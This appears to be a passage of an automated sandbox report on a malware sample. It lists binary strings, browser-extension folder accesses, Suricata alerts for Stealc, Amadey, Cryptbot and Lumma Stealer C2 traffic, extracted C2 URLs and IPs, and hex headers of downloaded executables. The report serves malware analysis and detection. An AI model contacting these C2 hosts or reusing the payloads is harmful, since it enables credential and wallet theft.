Source: Binary string: wsock32.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8audioses.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sspicli.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shell32.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8rasadhlp.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8msvcp_win.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8taskschd.pdb source: firefox.exe, 00000031.00000002.3359262332.0000024F7132B000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: propsys.pdb8 source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dnsapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nlaapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8fwpuclnt.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: winhttp.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msimg32.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mswsock.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntasn1.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: devobj.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8advapi32.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8Windows.Storage.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8OnDemandConnRouteHelper.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: propsys.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8netprofm.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: gdi32.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: avrt.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8Windows.Globalization.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000031.00000002.3376454757.0000024F749A9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WLDP.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8vcruntime140_1.amd64.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8lgpllibs.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nssckbi.pdb@ source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8gdi32full.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8vcruntime140.amd64.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: winrnr.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: version.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dbgcore.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8OnDemandConnRouteHelper.pdb0B source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: user32.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8DataExchange.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8wintrust.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: psapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8WindowManagementAPI.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8npmproxy.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8linkinfo.pdb source: firefox.exe, 00000031.00000002.3359262332.0000024F7132B000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8Windows.UI.Immersive.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 1MB later: 41MB
Source: firefox.exe Memory has grown: Private usage: 0MB later: 182MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49782 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49789
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49821 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49842 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49864 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49870 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49886 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49896 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49906 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49924 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49926 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50033 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49947 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49885 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49845 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49884 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49884 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49845 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49998 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49852 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49852 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49928 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49983 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49893 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49893 -> 172.67.162.84:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: https://property-imper.sbs/api
Source: Malware configuration extractor IPs: 185.215.113.43
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 33
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 